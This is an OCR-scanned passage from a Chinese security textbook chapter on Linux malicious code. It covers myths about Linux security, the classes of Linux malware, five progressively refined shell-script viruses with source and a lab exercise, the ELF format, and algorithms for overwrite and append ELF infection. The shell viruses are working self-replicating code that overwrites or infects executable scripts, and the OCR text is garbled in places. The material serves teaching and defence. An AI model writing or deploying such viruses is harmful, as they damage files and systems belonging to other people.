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很 巧妙 的 病毒 可 以 利用 自己 的 方法 来 找到 文件 系统 上 的 每 个 文件 。NT 用 户 或 者 ACL 机 
制 都 没有 很 好 地 重视 这 个 问题 。 

另 一 个 误区 就 是 认为 Linux 系统 尤其 可 以 防止 病毒 的 感染 ,因为 Linux 的 程序 大 多 数 
都 由 源 代码 直接 编译 而 来 ,而 不 是 直接 使 用 二 进 制 格式 。 但 是 这 却 正 是 应 该 重视 的 ,因为 毕 
竟 只 有 极 少数 的 人 (甚至 管理 员 ) 才 有 足够 的 能 力 来 从 源 代 码 中 发 现 恶 意 代 码 ,而且 这 是 一 
个 相当 耗费 时 间 和 精力 的 工作 。 一 般 的 用 户 习惯 于 用 二 进 制 格式 的 文件 来 交流 ,因为 他 们 
不 想 在 使 用 这 些 程序 的 时 候 还 要 很 烦琐 地 执行 诸如 make 之 类 的 命令 ,他 们 喜欢 很 简单 地 
运行 程序 。 上 述 这 些 原因 就 给 了 Linux 系统 上 的 病毒 有 足够 的 空间 来 访问 和 操控 系统 。 

第 三 个 误区 就 是 认为 Linux 系统 是 绝对 安全 的 ,因为 它 具 有 很 多 不 同 的 平台 ,而 且 每 个 
版 本 的 Linux 系统 有 很 大 的 区 别 。 但 是 现在 不 能 这 样 看 了 。 现 在 的 恶意 代码 都 用 标准 C 
来 编写 以 适应 任何 类 Linux 操作 系统 ,它们 可 以 用 make 程序 来 跨 平台 编译 ,并 且 拥 有 标准 
的 ELF 二 进 制 格式 和 库 文 件 。Morris 写 的 Internet 蠕虫 病毒 利用 的 就 是 这 项 技术 。 


4.2 Linux 系统 恶意 代码 的 分 类 


按照 编制 机 理 ,可 以 把 Linux 系统 下 的 恶意 代码 分 为 如 下 类 别 。 

1. Shell 恶意 脚本 

除了 复制 技术 外 ,恶意 代码 面临 的 最 大 技术 难题 就 是 如 何 传播 ,这 是 恶意 代码 天 生 具 有 
的 问题 ,至 少 在 Linux 系统 上 是 如 此 ,因此 需要 想 办 法 解决 平台 兼容 问题 。 所 以 首先 想到 的 
是 Shell 脚本 语言 。Shell 在 不 同 的 Linux 系统 上 的 差别 很 小 。Fred Cohen 在 他 的 书 ( 入侵 
者 ,蠕虫 和 病毒 》( 发 表 于 1990 年 ) 中 写 道 :“ 在 UNIX 的 命令 解释 语言 中 ,病毒 代码 可 以 被 
写 到 200 个 字 节 之 内 。” 

书写 Shell 恶意 脚本 是 一 个 很 简单 的 制造 Linux 恶意 代码 的 方法 。 但 是 ,脚本 病毒 怎 
么 会 是 真正 的 病毒 呢 ? 它 只 是 用 脚本 诸 言 来 书写 的 而 不 是 用 汇编 。 实 际 上 ,评定 一 个 程序 
是 病毒 是 因为 它 本 身 可 以 在 系统 上 任意 感染 传播 ,而 不 是 这 个 程序 的 大 小 或 者 用 什么 语言 
来 写 。 在 UNIX 1989 卷 2 上 可 以 看 到 Tom Duff 和 M. Douglas Mcllroy 的 恶意 脚本 代码 。 
Shell 恶意 脚本 的 危害 性 不 会 很 大 并 且 它 本 身 极 易 被 发 现 ,因为 它 是 以 明文 方式 编写 并 执行 
的 ,任何 用 户 和 管理 员 都 可 以 发 觉 它 的 代码 。 通 常 一 个 用 户 会 深信 不 疑 地 去 执行 任何 脚本 ， 
而 且 不 会 过 问 该 脚本 的 由 来 ,这 样 , 它 们 就 都 成 为 恶意 脚本 的 目标 。 这 些 都 是 意识 问题 ,这 
样 是 没 办 法 避免 病毒 的 入 侵 的 ,所 以 需要 大 大 加 强 对 这 些 病毒 的 防范 意识 。 

2. 蠕虫 

像 Windows 平 台 一 样 ,Linux 平台 也 有 蠕虫 。 先 回忆 一 下 Morris 蠕虫 。 这 个 蠕虫 利 
用 sendmail 程序 已 存在 的 一 个 漏洞 来 获取 其 他 计算 机 的 控制 权 。 蠕 虫 一 般 会 利用 rexec、 
fingerd 或 者 口令 猜 解 来 尝试 连接 。 在 成 功 人 侵 之 后 , 它 会 在 目标 计算 机 上 编译 源 代码 并 且 
执行 它 , 而 且 会 有 一 个 程序 来 专门 负责 隐藏 自己 的 痕迹 。 

蠕虫 一 般 都 是 利用 已 知 的 攻击 程序 去 获得 目标 机 的 管理 员 权限 ,因此 蠕虫 的 生命 也 是 
很 短暂 的 。 之 所 以 生命 短暂 是 因为 , 当 它 所 利用 的 漏洞 被 修补 的 话 ,那么 该 蠕虫 也 就 失去 作 
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用 了 。 蠕 虫 需要 利用 漏洞 来 进行 自身 的 传播 ,而 漏洞 以 及 漏洞 的 利用 一 般 只 针对 特定 版 本 
的 特定 程序 才 有 效 。 如 果 它 所 利用 的 漏洞 被 修补 ,蠕虫 也 会 失去 作用 。 所 以 蠕虫 的 跨 平 台 
能 力 很 差 ,时 效 性 也 很 弱 。 很 显然 ,Linux 系统 下 的 蠕虫 是 专门 针对 该 平台 的 蠕虫 。 

3. 基于 欺骗 库 函 数 恶意 代码 

Linux 下 的 欺骗 库 函 数 技术 可 以 欺骗 那些 技术 不 高 的 用 户 。 利 用 LD_PRELOAD 环境 
变量 就 可 以 来 捉弄 他 们 ,让 他 们 执行 黑客 的 代码 。 欺 骗 方法 就 是 利用 LD_PRELOAD 环境 
变量 把 标准 的 库 函 数 蔡 换 成 了 黑客 的 程序 。LD_PRELOAD 并 不 是 Linux 系统 特有 的 ,并 
且 它 一 般 用 在 一 些 应 用 程序 中 (如 旧版 本 的 StarOffice 需要 运行 在 较 新 版 本 的 RedHat 系 
统 上 ) ,必须 用 它们 自己 的 (或 者 比较 旧 的 版 本 ,或 者 修改 过 的 ) 库 函数 ,因为 在 安装 的 时 候 没 
有 满足 它们 的 需求 。 

4. 与 平台 兼容 的 恶意 代码 

如 果 用 标准 C 来 书写 恶意 代码 ,在 各 种 不 同体 系 的 Linux 系统 中 编译 及 运行 变化 不 
大 。 只 要 对 方 计算 机 有 一 个 gcc 编译 器 ,恶意 代码 就 可 以 很 轻易 地 扩散 。 当 然 , 很 多 恶意 代 
码 都 还 是 用 汇编 来 编写 的 。 当 利用 ELF 格式 的 二 进 制 文件 来 传播 恶意 代码 时 (这 种 恶意 代 
码 被 誉 为 计算 机 病毒 中 的 标准 模式 ,它们 用 汇编 编写 并 且 通 过 可 执行 程序 感染 ) ,就 很 像 典 
型 的 DOS 及 Windows 下 的 恶意 代码 。 可 以 通过 往 ELF 文件 的 文本 段 之 后 的 填充 区 增加 
代码 来 感染 ELF 文件 ,搜索 目录 树 中 文件 的 ET_EXEC 和 ET_DYN 标记 看 看 是 否 被 隐藏 
(这 些 依 靠 管 理 员 自身 的 经 验 )。 

当然 ,在 Linux 系统 下 实现 这 种 恶意 代码 并 不 太 容 易 。 如 果 一 个 恶意 代码 感染 的 文件 
属 主 是 普通 用 户 权 限 ,那么 它 所 得 到 的 权限 当然 也 就 只 有 普通 用 户 权 限 , 只 能 对 该 用 户 权限 
级 别 的 文件 和 数据 造成 危害 。 但 是 当 一 个 恶意 代码 感染 了 一 个 root 权限 的 文件 时 ,那么 它 
就 可 以 控制 系统 的 一 切 了 。 


4.3 Shell 恶意 脚本 


对 于 Shell 编程 的 程序 员 来 说 所 谓 的 Shell 病毒 技术 其 实 很 简单 ,关于 这 点 在 看 完 本 节 
内 容 后 就 会 有 所 体会 。 但 是 ,简单 归 简 单 .还 是 要 去 了 解 它 的 工作 方式 。 本 节 最 后 还 设计 了 


4.3.1 Shell 恶意 脚本 编制 技术 


1. 最 原始 的 Shell 恶意 脚本 
下 面 看 一 个 最 原始 的 Shell 恶意 脚本 。 这 段 代 码 虽然 简单 ,但 却 最 能 说 明 问题 。 


提 shellviru 工 # 

for file in ./infect/* 
do 

cp $0 $file 

done 
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这 段 代码 的 第 一 行 是 注释 行 ,在 这 里 ,用 这 个 功能 作为 防止 重复 感染 的 标记 。 这 段 代 码 
的 功能 是 遍历 当前 目录 中 子 目 录 infect 中 的 所 有 文件 ,然后 覆盖 它们 。 如 果 还 认为 威力 不 
够 的 话 ,可 以 用 “for file in * ”来 代替 搜索 语句 ,这 样 就 可 以 遍历 整个 文件 系统 中 的 所 有 文 
件 。 但 是 ,大 家 知道 Linux 是 多 用 户 的 操作 系统 , 它 的 文件 是 具有 保护 模式 的 ,所 以 ,以 上 的 
脚本 有 可 能 会 报 出 一 大 堆 的 错误 ,因此 它 可 能 很 快 就 会 被 管理 员 发 现 并 制止 传染 。 接 下 来 ， 
要 为 该 脚本 做 些 基 本 的 条 件 判断 ,使 其 隐蔽 性 大 大 增强 。 

大 家 知道 ,恶意 代码 制作 的 核心 是 能 够 实现 自我 复制 ,因此 ,该 代码 的 核心 语句 为 


cp $0 $file 


2. 一 个 简单 的 Shell 恶意 脚本 


井 shellvirus II# 

for file in ./infect/* 

do 

if test -f $file // 判 断 是 否 为 文件 
then 

if test -x $file // 判 断 是 否 可 执行 
then 

if test -w $file // 判 断 是 否 有 写 权限 
then 

证 grep - s echo $ file> .mmm // 判 断 是 否 为 脚本 文件 
then 

cp $0 $file // 覆 盖 当 前 文件 

fi 

Es 

fi 

done 


rm .mmm —f 


这 段 代 码 是 对 上 一 个 程序 的 改进 ,这 里 增加 了 若干 的 判断 。 判 断 文 件 是 否 存 在 ,是 否 可 
执行 ,是 否 有 写 权限 ,是否 为 脚本 程序 等 。 如 果 判 断 条 件 都 为 " 真 ”就 执行 


cp $0 $file 
这 句 代 码 的 功能 是 破坏 该 系统 中 所 有 的 脚本 程序 的 ,危害 性 还 是 比较 大 的 。 


if grep - s echo $ file> /.mmm 


这 句 代 码 的 功能 就 是 判断 当前 文件 是 否 为 Shell 脚本 程序 。 
这 个 脚本 病毒 一 旦 破坏 完毕 就 什么 也 不 做 了 , 它 没有 像 二 进 制 病毒 那样 的 潜伏 性 。 
且 , 以 上 的 脚本 只 是 简单 地 覆盖 宿主 而 已 ,所 以 需要 利用 传统 的 二 进 制 病 毒 的 感染 机 制 。 
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3. 具有 感染 机 制 的 Shell 恶意 脚本 


并 shellvirus III# 


# infection 

head ~-n35 $0>.testl // 提 取 病 毒 自身 代码 并 保存 到 . test 
for file in ./* // 遍 历 当前 目录 中 的 文件 

do 

echo $ file 

head -nl $file>.mm // 提 取 要 感染 的 脚本 文件 的 第 一 行 
if grep infection .mm > .mmm // 判 断 是 否 有 感染 标记 infection 
then // 已 经 被 感染 , 则 跳 过 

echo "infected file and rm .mm" 

Im 一 于 .mm 

else // 尚 未 感染 ,继续 执行 

if test -ff $file 

then 


echo "test —f£" 

if test -x $file 

then 

echo "test —x" 

if test ~-w $file 

then 

echo "test —w" 

if grep -— s echo $ file> .mmm 

then 

echo "test 一 s and cat..." 

cat $ file > .SAVEE // 把 病毒 代码 放 在 脚本 文件 的 开始 部 分 
cat ,testl > $ file // 原 有 代码 追加 在 末尾 

cat .SAVEE >> $ file // 形 成 含有 病毒 代码 的 脚本 文件 
£4 

fi 

fi 

和 

和 

done 


rm .testl .SAVEE .mmm .mm - f // 清 理工 作 


通过 把 病毒 代码 和 原 有 脚本 组 合 的 方式 ,将 这 段 程序 增加 病毒 的 潜伏 特性 ,原理 非常 容 
易 理解 。 但 这 段 代码 还 有 个 弱点 , 那 就 是 特别 容易 被 发 现 。 其 实 Shell 脚本 一 般 都 是 明文 
的 ,所 以 容易 被 发 现 。 尽 管 如 此 ,这 段 代 码 的 危害 性 已 经 相当 大 了 。 这 段 程序 用 了 一 个 感染 
标志 infection 来 判断 当前 文件 是 否 已 经 被 感染 ,这 在 程序 中 可 以 反映 出 来 。 

4. 更 加 隆 涩 的 恶意 脚本 

为 了 使 上 面 的 病毒 代码 不 容易 被 发 现 .必须 修改 它 , 使 它 看 起 来 非常 难 履 。 修 改 的 方法 
有 很 多 ,最 先 考虑 的 技术 肯定 是 精练 代码 ,这 可 以 使 代码 星 涩 难 懂 。 


提 ShellVirus IV# 
# infection 
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for file in./* ;do // 分 号 (;) 表 示 命 令 分 隔 符 


if test -f $file && test —x $file && test —w $file ; then 
if grep - s echo $ file > /dev/nul ; then 


head -nl $file> .mm 


if grep - s infection .mm > /dev/nul ; then 


Im 一 .mm ; else 
head -nl4 $0> .SRVEE 
cat $ file>> .SAVEE 


用 更 
兴趣 


在 回 


cat .SAVEE > $ file 
£3 

done 

rm —f£ .SAVEE .mm 


现在 恶意 代码 只 会 产生 两 个 临时 文件 了 ,并 且 病 毒 代码 也 被 精简 到 了 14 行 。 当 然 可 以 
精练 的 方法 把 代码 压缩 到 1 行 或 2 行 。 在 这 里 ,只 是 想 说 明 精 练 代码 问题 ,如 果 读 者 感 
,可 以 自己 练习 。 

Shell 病毒 代码 还 有 哪些 需要 改进 的 地 方 呢 ? 因为 大 多 数 有 用 的 系统 配置 脚本 都 存放 
定 的 目录 下 (如 根 目录 、/etc、/bin 等 ) ,所 以 ,病毒 要 感染 这 些 目录 来 增加 其 破坏 力 。 其 
现 这 个 目的 也 不 难 ,只 要 对 上 述 代码 稍 做 改动 就 可 以 了 。 

5. 感染 特定 目录 的 Shell 恶意 脚本 


# ShellVirus V# 


# infection 

xtemp = $ pwd // 保 存 当前 路 径 

head -mn 22 $0>/.testl 

for dir in./* ;do // 遍 历 当前 目录 

if test -d $ dir ; then // 如 果 有 子 目录 则 进入 
cd $dir 

for file in./* ;do // 遍 历 该 目录 文件 


if test -f $file && test -X $file && test —w $file; then 
if grep - s echo $ file > /dev/nul ; then 
head -nl $file> .mm 

if grep - s infection .mm > /dev/nul ; then 
rm 一 上 .mm ; else 

cat $ file > /.SAVEE // 完 成 感染 
cat /.testl > $ file 

cat /.SAVEE >> $ file 

2 

done 

ed 

fi 

done 

cd $ xtemp 

rm -ff£/.testl /.SAVEE .mm // 清 理工 作 


这 段 代码 仅仅 感染 了 当前 目录 下 的 一 层 目 录 。 当 然 , 可 以 增加 几 个 循环 ,使 它 感染 更 深 


层 的 目录 。 也 可 以 定位 到 根 目录 ,使 它 感染 根 目录 的 下 层 目录 。 男 外 ,Shell 病毒 还 可 以 做 
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很 多 事情 ,例如 ,下 载 后 门 程序 到 本 机 ,为 计算 机 自动 开 后门 ,主动 去 攻击 因特网 中 的 其 他 计 
算 机 ,获取 用 户 的 电子 邮件 来 发 送 染 毒 程序 等 。 总 之 ,恶意 脚本 的 实现 技术 不 高 深 , 但 比较 
实用 。 


4.3.2 Shell 恶意 脚本 实验 


【实验 目的 】 
(1) 了 解 Linux 脚本 型 恶意 代码 的 基本 编制 原理 。 
(2) 了 解 恶意 脚本 的 感染 与 破坏 机 制 ,进一步 认识 Linux 操作 系统 下 的 恶意 代码 。 


【实验 环境 】 
Red Hat Linux 操作 系统 。 
【实验 步 又】 


文件 位 置 : 本 书 配套 素材 目录 \Experiment\LinuxScript。 该 目录 下 共 包 含 v_1. sh、 
Vv_2. sh、v_3. sh、v_4. sh 和 v_5. sh 等 5 个 Linux 系统 下 的 恶意 脚本 文件 。 复制 这 些 文件 
到 Linux 系统 。 

(1) 修改 这 些 恶意 脚 本 为 可 执行 文件 。 

(2) 创建 测试 用 脚本 文件 (如 test. sh) ,根据 病毒 感染 能 力 ,注意 测试 文件 的 属性 .所 在 
目录 层次 等 。 

(3) 依次 执行 这 5 个 恶意 脚本 ,查看 它们 的 执行 效果 。 

【实验 注意 事项 】 

(1) 本 恶意 脚本 程序 用 于 实验 目的 ,请 妥善 使 用 。 

(2) 本 恶意 脚本 程序 具有 一 定 的 破坏 力 ,做 实验 室 注意 安全 ,推荐 使 用 虚拟 机 环境 。 

(3) Linux 和 Windows 的 编辑 格式 不 一 样 , 当 把 文件 复制 到 Linux 系统 中 时 ,请 注意 编 
辑 格 式 。 


4.4 ELF 文件 格式 


可 执行 链接 格式 (Executable and Linkable Format, ELF) 是 UNIX 系统 实验 室 (USL) 
作为 应 用 程序 二 进 制 接口 (Application Binary Interface, ABD) 而 研发 的 。 工 具 接 口 标准 委 
员 会 (Tool Interface Standards,TIS) 选 择 了 正在 发 展 中 的 ELF 标准 作为 工作 在 32 位 Intel 
体系 结构 上 不 同 操作 系统 之 间 可 移植 的 二 进 制 文件 格式 。 

ELF 标准 定义 了 一 个 二 进 制 接口 集合 ,以 支持 流线型 的 软件 开发 。 这 可 以 减少 不 同 执 
行 接口 实现 的 数量 ,因此 可 以 减少 重新 编程 和 编译 的 需要 。 

ELF 文档 服务 于 不 同 的 操作 系统 上 目标 文件 的 创建 或 者 执行 文件 的 开发 。 它 分 以 下 
3 个 部 分 。 

(1)“ 目 标 文件 ”描述 了 ELF 目标 文件 格式 3 种 主要 的 类 型 。 

(2)“ 程 序 装载 和 动态 链接 ”描述 了 目标 文件 的 信息 和 系统 在 创建 运行 时 程序 的 行为 。 

(3)“C 语言 库 ” 列 出 了 所 有 包含 在 libsys 中 的 符号 标准 的 ANSIC 和 libe 的 运行 程 
序 ,还 有 libe 运行 程序 所 需 的 全 局 的 数据 符号 。 
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4.5 ELF 格式 文件 感染 原理 


本 节 分 析 了 多 种 感染 方法 ,由 非 ELF 相关 到 ELF 相关 的 方法 ,由 简单 到 复杂 的 感染 方 
法 ,涉及 大 多 数 Linux 病毒 的 使 用 感染 方法 。 非 ELF 相关 的 感染 方法 主要 有 两 类 , 即 覆 盖 
式 感染 和 追加 式 感染 。ELF 相关 的 感染 方法 ,包括 利用 文本 段 之 后 填充 感染 ,数据 段 之 后 
插入 感染 ,文本 段 之 前 插入 感染 、 函 数 对 其 填充 区 感染 以 及 利用 NOTE 段 等 多 种 感染 方法 。 
LKM 感染 技术 和 PLT/GOT 支持 感染 技术 是 Linux 病毒 的 高 级 技术 。 


4.5.1 无 关 ELF 格式 的 感染 方法 


无 关 ELF 格式 的 感染 ,可 以 称 为 简单 感染 , 它 并 没有 涉及 任何 可 执行 文件 格式 的 内 容 ， 
直接 使 用 的 是 可 独立 执行 的 病毒 代码 。 多 数 情况 下 这 种 病毒 都 会 破坏 原宿 主 文件 最 终 造成 
原宿 主 文件 得 不 到 执行 ,这 种 方法 很 容易 被 发 现 , 与 病毒 设计 的 初衷 相 眉 ,并 且 这 种 破坏 式 
传染 的 病毒 通常 感染 一 个 文件 后 就 很 难 继续 传播 。 因 为 它 一 方面 易 被 发 现 移 除 , 另 一 方面 
造成 大 量 文件 被 破坏 从 而 会 导致 系统 损害 ,得 不 偿 失 。 一 般 情 况 下 ,这 种 病毒 可 以 作为 木马 
后 门 病毒 来 使 用 , 当 文 件 执行 时 向 系统 添加 后 门 守护 进程 ,从 而 进行 远程 控制 或 者 其 他 黑客 
活动 。 

在 本 文中 介绍 的 两 种 简单 感染 方法 只 是 粗略 讲解 大 臻 算法, 并且 尽量 克服 上 述 感 染 广 
面 的 问题 。 例 如 ,本 文 的 算法 会 将 原宿 主 文件 作为 备份 ,从 而 在 病毒 执行 之 后 交换 控制 权 到 
原宿 主 文件 ,以 尽 可 能 避免 被 检测 到 。 

1. 覆盖 式 感染 


有 些 病 毒 会 强行 覆盖 执行 程序 的 某 一 部 分 ,将 自身 代码 嵌入 其 中 ,以 达到 不 改变 被 感染 
文件 长 度 的 目的 ,被 这 样 的 病毒 覆盖 掉 的 代码 无 法 复原 ,从 而 这 种 病毒 是 无 法 被 安全 杀 除 
的 。 病 毒 破坏 了 文件 的 某 些 内 容 ,在 杀 除 这 种 病毒 后 无 法 恢复 文件 的 原貌 。 

在 实际 工作 中 这 类 病毒 的 例子 是 Bliss 病毒 ,这 类 病毒 仍然 保有 恢复 措施 , 即 加 一 定 的 

参数 可 以 恢复 原来 的 宿主 文件 。 
这 种 感染 最 初 的 思路 很 简单 ,就 是 将 病毒 体 直接 复制 到 宿主 文件 中 ,从 开始 部 分 覆盖 宿 
主 文件 ,一 直到 宿主 文件 被 感染 成 单纯 的 病毒 体 ,一 般 情况 下 宿主 文件 会 遭 到 破坏 , 若 要 使 
得 在 病毒 执行 后 仍然 交换 控制 权 给 宿主 文件 , 则 需要 给 宿主 文件 备份 ,这 里 的 思路 并 不 复 
杂 , 只 是 将 原宿 主 文件 复制 到 一 个 隐藏 文件 ,然后 在 病毒 体 执行 完 之 后 执行 宿主 文件 ,使 得 
进程 映像 中 添加 的 是 原宿 主 文件 的 内 容 。 

这 种 感染 方法 存在 strip 的 问题 ,只 需要 使 用 strip 命令 就 可 以 很 容易 地 检测 出 病毒 。 
因为 ELF 头 部 算是 整个 ELF 可 执行 文件 的 路 线 图 ,指定 文件 中 的 合法 部 分 ,由 于 宿主 文件 
剩余 部 分 并 没有 在 ELF 头 中 有 任何 说 明 , 因 此 strip 命令 会 将 其 删除 ,从 而 文件 在 strip 后 
会 变 小 。 由 此 可 见 ,该 种 病毒 虽然 想法 简单 ,实现 简单 ,但 也 是 高 度 不 可 靠 的 。 有 具体 的 实现 
算法 (感染 前 后 的 状态 如 图 4-1 所 示 ) 如 下 。 

(1) 扫描 当前 目录 ,查找 可 执行 文件 (也 可 以 进行 小 规模 的 目录 查找 ) 。 
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(2) 找到 可 执行 文件 test 后 , 先 将 其 复制 一 份 到 隐藏 文件 . test。 

(3) 修改 病毒 体 , 使 病毒 执行 结束 后 能 够 执行 (exec 函数 ) 文 件 . test, 进 行进 程 映像 蔡 
换 , 即 交还 控制 权 给 宿主 文件 。 

(4) 复制 病毒 体 到 test, 覆 盖 部 分 宿主 文件 。 

(5) 执行 当前 文件 的 原始 文件 备份 蔡 换 当前 进程 ,完成 原文 件 功能 ,有 利于 病毒 隐藏 。 

这 种 算法 还 有 其 他 的 缺点 ,就 是 增加 了 额外 的 文件 ,更 加 增 大 了 被 发 现 的 可 能 性 ,因此 ， 
对 于 这 种 覆盖 式 病毒 ,只 能 说 是 一 个 粗制滥造 的 原型 而 已 。 

本 课题 研究 阶段 简单 实现 了 该 病毒 ,具体 思路 如 上 面 算 法 所 描述 ,需要 进行 两 次 编译 ， 
第 一 次 编译 确定 编译 后 的 病毒 文件 大 小 ,然后 修改 原文 件 中 的 相关 宏 定义 后 再 次 编译 便 获 
得 了 具有 传染 能 力 的 病毒 。 这 种 病毒 能 够 在 执行 病毒 之 后 仍 完成 原来 ELF 文件 的 功效 ,但 
是 增加 了 额外 文件 ,尽管 是 隐藏 文件 ,但 仍然 很 容易 被 发 现 。 所 以 这 种 简单 思路 的 病毒 不 会 
大 规模 传染 , 仅 能 作为 模型 来 研究 。 

2. 追加 式 感染 


追加 式 感 染 最 初 的 思路 也 很 简单 , 同 覆盖 式 感染 方式 不 同 的 是 ,将 病毒 体 直 接 追 加 
到 宿主 文件 中 ,或 者 将 宿主 追加 到 病毒 体 之 后 ,并 不 存在 覆盖 宿主 文件 的 行为 ,从 而 宿主 
文件 被 感染 成 单纯 的 病毒 体 和 原宿 主 文件 的 合体 ,在 病毒 文件 执行 后 将 控制 权 交 还 给 宿 
省 交 伴 ; 

将 宿主 文件 追加 到 病毒 体 尾部 的 方法 不 需要 使 用 到 ELF 文件 格式 的 内 容 ,只 需要 在 病 
毒 体 中 进行 相关 设置 ,即使 病毒 体能 够 知道 自己 的 大 小 ,才能 在 病毒 体 执行 完 后 ,定位 到 宿 
主 文件 开始 处 ,并 读 取 宿主 文件 到 临时 文件 ,然后 执行 临时 文件 进行 进程 映像 蔡 换 。 具 体 算 
法 描述 如 下 (追加 式 感染 前 后 状态 如 图 4-2 所 示 ) 。 


Vi Host 
Virus 
Host 


Host 


图 4-1 覆盖 式 感染 前 后 宿主 文件 状态 图 图 4-2 追加 式 感染 前 后 宿主 文件 状态 图 


感染 过 程 : 

(1) 查找 当前 目录 下 的 可 执行 文件 (也 可 以 进行 小 规模 的 目录 查找 ) 。 

(2) 找到 可 执行 文件 test。 

(3) 修改 病毒 体 ,使 病毒 执行 结束 后 能 够 提取 宿主 文件 到 一 个 新 文件 ,然后 执行 这 个 新 
文件 进行 进程 映像 替换 , 即 交 还 控制 权 给 宿主 文件 。 

(4) 合并 病毒 体 到 test, 不 覆盖 宿主 文件 ,但 放 在 宿主 文件 内 容 之 前 。 

(5) 执行 ,过 程 如 下 。 

病毒 体 先 执 行 。 
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@ 病毒 体 执行 完 后 ,找到 病毒 体 尾部 。 

G 提取 宿主 文件 到 新 文件 。 

@ 执行 新 文件 。 

通过 上 面 的 描述 ,这 样 的 感染 仍然 存在 strip 问题 , 它 会 把 宿主 文件 删除 。 原 因 同 上 所 
述 ,因为 ELF 头 部 是 整个 ELF 可 执行 文件 的 路 线 图 ,指定 文件 中 的 合法 部 分 ,由 于 宿主 文 
件 剩余 部 分 并 没有 在 ELF 头 中 有 任何 说 明 , 因 此 strip 命令 会 将 其 删除 ,从 而 文件 在 strip 
后 会 变 小 。 只 需要 使 用 strip 命令 就 很 容易 地 检测 出 这 一 类 病毒 。 因 此 必须 提出 其 他 的 改 
进 方法 ,如 扩展 一 个 节 来 包含 宿主 文件 ,但 过 大 的 宿主 文件 可 能 会 造成 更 大 的 可 疑 ,并 且 一 
个 节 包 含 整个 可 独立 执行 文件 也 是 不 现实 的 ,至 于 更 深层 次 的 改进 措施 则 需要 ELF 格式 文 
件 的 内 容 分 析 。 

这 种 算法 的 另 一 个 问题 是 会 创建 临时 文件 ,如 果 想 在 宿主 执行 后 消除 临时 文件 , 单 靠 宿 
主 文件 是 不 可 能 的 ,因为 未 对 宿主 进行 任何 修改 ,因此 必须 建立 新 的 进程 来 完成 这 样 的 工 
作 。 一 些 病 毒 不 会 清除 创建 的 临时 文件 ,如 8000 和 VLP 病毒 ,另外 一 些 会 创建 额外 的 进程 
删除 临时 文件 ,如 病毒 FILE。 

另外 一 种 方法 是 将 病毒 体 追 加 在 宿主 文件 末尾 处 ,该 方法 的 实现 则 需要 修改 ELF 头 中 
的 相关 项 目 , 如 入 口 点 。 一 种 实现 方法 就 是 修改 入 口 点 使 其 指向 病毒 体 执行 的 代码 处 ,然后 
病毒 体 执行 结束 后 跳 转 回 原宿 主 代码 交还 控制 权 ,但 是 这 样 的 ELF 文件 格式 相关 的 内 容 不 
是 本 节 讨 论 的 重点 ,这 个 问题 将 在 下 一 节 中 介绍 。 

3. 实现 与 改进 

对 于 非 ELF 相关 感染 方法 strip 后 会 导致 文件 病毒 体外 多 余 内 容 除 去 的 问题 ,可 以 考 
虑 通过 以 下 几 种 方法 来 解决 。 

(1) 由 于 strip 会 根据 ELF 头 以 及 ELF 节 头 表 来 判断 应 该 除去 哪些 内 容 , 因 此 ,考虑 的 
是 扩展 最 后 一 节 来 包含 病毒 体外 多 余 的 内 容 。 一 般 的 病毒 体 最 后 一 节 是 . strtab, 即 字符 串 
表 (string table) ,而 病毒 体 要 经 过 strip 后 最 后 一 节 . strtab 以 及 倒数 第 二 节 . symtab 都 将 不 
复 存 在 ,因此 扩展 这 两 节 是 没有 意义 的 。 再 往 上 是 病毒 体 的 节 头 表 (section header table) ， 
节 头 表 不 能 扩展 来 包含 多 余 内 容 , 节 头 表 前 面 一 个 节 是 . shstrtab, 即 节 头 表 字 符 串 表 
(section header string table) ,现在 就 考虑 扩展 这 一 个 节 来 包含 病毒 体 , 经 过 实验 验证 , 即 增 
大 这 一 节 节 头 的 sh_size 字段 来 包含 多 余 区 域 , 并 把 节 头 表 复 制 到 填充 的 多 余 区 域 之 后 ,最 
后 经 过 strip 测试 ,发 现 仍然 会 被 删除 。 因 为 strip 的 时 候 对 . shstrtab 这 一 节 也 会 进行 修 
改 , 将 这 一 节 内 的 某 些 内 容 删除 ,因此 将 多 余 区 域 放 入 这 一 节 也 是 不 现实 的 。 

(2) 再 次 尝试 其 他 的 方法 , 即 扩展 注释 节 。 在 FC6 操作 系统 中 ,使 用 的 是 2. 6. 18-1. 
2798. fc6 的 系统 内 核 ,在 这 个 系统 中 相关 的 位 置 上 只 有 一 个 不 属于 任何 段 的 . comment 节 。 
由 于 扩展 . note. ABI-tag 节 要 移动 过 多 的 节 , 因 为 这 一 节 位 置 处 于 文本 段 中 ,修改 的 地 方 的 
确 太 多 ,在 改进 非 ELF 格式 相关 的 感染 方法 中 得 不 偿 失 ,因此 放弃 扩展 这 一 节 。. comment 
节 的 位 置 在 . shstrtab 节 的 前 面 ,可 以 扩展 . comment 节 来 包含 多 余 区 域 , 前 提 是 病毒 体 先 经 
过 strip 处 理 。 

这 次 的 尝试 要 修改 的 地 方 很 多 .基本 处 理 算法 如 下 。 

@ 修改 . shstrtab 节 头 的 内 容 , 即 修改 sh_offset 字段 ,加 上 多 余 区 域 大 小 。 
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Q@ 修改 . comment 节 头 的 内 容 , 主 要 修改 sh_size 字段 ,加 上 多 余 区 域 的 大 小 。 

@ 修改 ELF 头 的 内 容 , 即 修改 e_shoff, 加 上 多 余 区 域 的 大 小 。 

@ 将 文件 的 节 头 表 和 . shstrtab 节 复 制 到 文件 末尾 。 

在 进行 编程 实现 的 时 候 ,对 于 某 些 合 适 的 文件 ,首先 确定 . comment 节 头 的 sh_name 为 
194, 借 此 来 判断 . comment 节 头 的 位 置 。 但 是 很 多 程序 并 没有 . comment 节 , 因 此 便 没有 办 
法 通过 扩展 . comment 节 来 插入 病毒 代码 。 对 于 这 一 种 方法 ,可 以 成 功 实现 ,但 仅 对 部 分 
ELF 可 执行 文件 有 效 。 

(3) 创建 一 个 新 节 ,来 包含 额外 的 区 域 。 

需要 修改 的 地 方 很 多 ,所 以 算法 也 是 很 复杂 的 。 

@ 修改 ELF 头 内 的 字段 , 即 e_shnum 字段 加 一 。 

@ 创建 节 头 表 内 新 的 表 项 ,附加 到 节 头 表 的 尾部 , 表 项 内 容 为 . comment 节 头 的 复制 ， 
修改 其 中 的 sh_offset 和 sh_size, 以 及 使 sh_entsize 和 sh_addralign 为 0。 

QQ 填充 包含 额外 区 域 放 在 文件 尾部 。 

该 算法 实验 程序 成 功 ,但 同上 面 方法 一 样 仅 对 部 分 程序 有 效 。 现 在 有 两 个 . comment， 
也 是 不 正常 的 情况 ,很 容易 被 发 现 。 因 此 隐藏 性 好 的 病毒 要 利用 下 面 的 高 级 的 技术 来 实现 。 


